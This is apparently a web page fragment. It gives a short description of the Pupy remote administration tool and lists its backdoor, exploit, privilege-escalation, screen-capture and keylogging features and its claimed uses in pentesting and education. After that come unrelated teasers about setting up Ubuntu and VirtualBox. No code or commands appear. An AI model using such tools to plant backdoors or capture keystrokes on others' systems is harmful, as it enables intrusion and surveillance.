        Simply put, this program, which can create backdoors for different systems, perform actions for attaching to remote systems, perform exploits to collect data, increase the privileges of downloading and uploading files, capture the screen, capture keystrokes, etc. as well as other similar tools, also perfectly is suitable for legitimate remote administration of systems.
        • Potential Pupy Uses:
        • Safety studies
        • Education
        • Penetration Testing
        • System administration
        • Privacy projects focused on python, requiring minimal interaction with persistent storage (so as not to leave traces on the hard disk)
        • And other…
        This is one of several articles about Pupy in which the installation is described step by step. The following articles will discuss the principles of the program, basic concepts, practical examples of use.

        Things to do After Installing Ubuntu 19.04


        As you may know, Ubuntu is the most popular distribution and the developers are trying to make it so that users do not need to spend a lot of time on settings, there are still many things that are missing by default.
        This article will look at setting up Ubuntu after installation, let's look at adding repositories, setting up the shell, and installing the most needed programs.

        how to install Ubuntu on VirtualBox

        In many cases, it is more convenient to configure a virtual machine and install the necessary programs on it than to do it on a real computer. First, when installing on a “clean” virtual machine, there is a greater chance that everything will pass without errors, since There will be no conflicts with already installed programs. Secondly, the virtual system can be easily “rolled back” to the previous state if something went wrong. Thirdly, all virtual machine data is stored as files on your computer, so it is easy to copy it somewhere else and, for example, take it with you on a business trip to work on any real computer in a familiar virtual environment. Fourthly, virtually any operating system (OS) can be installed on a virtual machine, including one that does not coincide with the system installed on your computer.